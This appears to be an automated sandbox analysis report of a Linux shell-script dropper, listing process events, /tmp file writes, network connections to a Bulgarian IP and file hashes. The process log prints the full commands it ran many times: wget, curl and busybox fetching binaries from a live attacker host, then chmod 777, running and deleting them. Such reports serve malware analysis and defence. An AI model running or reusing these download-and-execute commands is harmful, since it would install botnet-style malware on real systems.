N/A N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /usr/bin/curl N/A
File opened for modification /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /usr/bin/curl N/A
File opened for modification /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /usr/bin/curl N/A
File opened for modification /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /usr/bin/curl N/A
File opened for modification /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /usr/bin/curl N/A
File opened for modification /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /usr/bin/curl N/A
File opened for modification /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /usr/bin/curl N/A
File opened for modification /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /usr/bin/curl N/A
File opened for modification /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /usr/bin/curl N/A
File opened for modification /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /usr/bin/curl N/A
File opened for modification /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /usr/bin/curl N/A
File opened for modification /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /usr/bin/curl N/A
File opened for modification /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /usr/bin/curl N/A
File opened for modification /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /usr/bin/curl N/A
File opened for modification /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /usr/bin/curl N/A
File opened for modification /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /usr/bin/curl N/A
File opened for modification /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /usr/bin/curl N/A
File opened for modification /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /usr/bin/curl N/A
File opened for modification /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /usr/bin/curl N/A
File opened for modification /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /usr/bin/curl N/A
File opened for modification /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /usr/bin/curl N/A
File opened for modification /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /usr/bin/curl N/A
File opened for modification /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /usr/bin/curl N/A
File opened for modification /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /usr/bin/curl N/A
File opened for modification /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /usr/bin/curl N/A
File opened for modification /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /usr/bin/curl N/A
File opened for modification /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /usr/bin/curl N/A
File opened for modification /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /usr/bin/curl N/A

Processes

/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh

[/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/chmod

[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/rm

[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/wget

[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/chmod

[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs

[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/rm

[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/wget

[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/chmod

[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs

[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/rm

[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/wget

[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/chmod

[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G

[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/rm

[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/wget

[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/chmod

[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb

[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/rm

[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/usr/bin/wget

[wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/chmod

[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe

[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/rm

[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/usr/bin/wget

[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/chmod

[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm

[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/rm

[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/wget

[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/chmod

[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6

[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/rm

[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/wget

[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/chmod

[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc

[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/rm

[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/wget

[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/chmod

[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD

[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/rm

[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/wget

[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/chmod

[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn

[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/rm

[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/wget

[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/chmod

[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM

[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/rm

[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/wget

[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/chmod

[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z

[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/rm

[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/wget

[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/chmod

[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ

[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/rm

[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/chmod

[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm

[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/rm

[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/wget

[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/chmod

[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6

[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/rm

[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/wget

[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/chmod

[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn

[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/rm

[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/wget

[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/chmod

[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM

[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/rm

[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/wget

[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/chmod

[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z

[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/rm

[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/wget

[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/chmod

[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ

[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/rm

[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/chmod

[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc

[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/rm

[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/wget

[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/chmod

[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD

[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/rm

[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/wget

[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/chmod

[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs

[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/rm

[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/wget

[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/chmod

[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs

[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/rm

[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/wget

[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/chmod

[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G

[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/rm

[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/wget

[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/chmod

[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/rm

[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/wget

[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/chmod

[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb

[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/rm

[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/usr/bin/wget

[wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/chmod

[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe

[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/rm

[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
US 151.101.193.91:443 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
GB 195.181.164.14:443 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97